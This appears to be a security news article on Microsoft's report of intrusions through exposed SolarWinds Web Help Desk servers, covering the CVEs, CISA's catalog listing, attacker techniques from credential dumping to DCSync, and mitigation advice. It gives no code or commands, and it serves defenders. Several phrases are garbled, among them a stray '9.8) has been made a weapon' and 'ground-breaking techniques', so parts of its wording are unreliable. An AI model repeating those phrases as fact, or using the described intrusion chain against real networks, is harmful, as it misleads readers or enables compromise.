Microsoft has disclosed that it has observed a multi-stage intrusion that involved threat actors using Internet-exposed SolarWinds Web Help Desk (WHD) instances to gain initial access and later move to other high-value assets in the organization’s network.
That said, the Microsoft Defender Security Research team said it is unclear whether the activity affected the recently disclosed vulnerabilities (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), or a previously patched vulnerability (CVE-2025-26399, CVSS score: 8.1). 9.8) has been made a weapon.
“Because the attacks occurred in December 2025 and were on machines that were vulnerable to both the old and new sets of CVEs at the same time, we cannot reliably confirm the exact CVEs used to achieve the initial capture,” the company said in a report published last week.
While CVE-2025-40536 is a security control bypass vulnerability that could allow an unauthenticated attacker to gain access to certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could lead to remote code execution.
Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploitable Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civil Executive Branch (FCEB) agencies were ordered to implement fixes for the defect by February 6, 2026.
In the attacks detected by Microsoft, successful exploitation of an exposed SolarWinds WHD instance allowed attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.
“After successful exploitation, the compromised service of the WHD instance gave rise to the PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution,” noted researchers Sagar Patil, Hardik Suri, Eric Hopper and Kajhon Soyini.
In the next step, the threat actors downloaded legitimate components associated with Zoho ManageEngine, a legitimate remote monitoring and management (RMM) solution, to enable persistent remote control over the infected systems. The attackers then took a series of actions –
- Sensitive domain users and groups, including domain admins, were enumerated.
- Persistence was established via reverse SSH and RDP access, with the attackers also attempting to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account at system startup to cover tracks within the virtualized environment while exposing SSH access via port forwarding.
- DLL side-loading was used on some hosts by using a legitimate system executable “wab.exe” associated with the Windows Address Book to dump the contents of LSASS memory and launch a rogue DLL (“sspicli.dll”) to steal credentials.
In at least one case, Microsoft said threat actors conducted a DCSync attack, where a domain controller (DC) is simulated to request password hashes and other sensitive information from an Active Directory (AD) database.
To combat the threat, users are advised to keep WHD instances up to date, find and remove any unauthorized RMM tools, rotate service and administrator accounts, and isolate compromised machines to limit the breach.
“This activity reflects a common but high-impact pattern: When vulnerabilities are not patched or inadequately monitored, a single exposed application can provide a path to full domain compromise,” the Windows maker said.
“In this intrusion, the attackers relied heavily on ground-breaking techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of Internet-facing services, and behavior-based detection at the detection, endpoint, and network layers.”
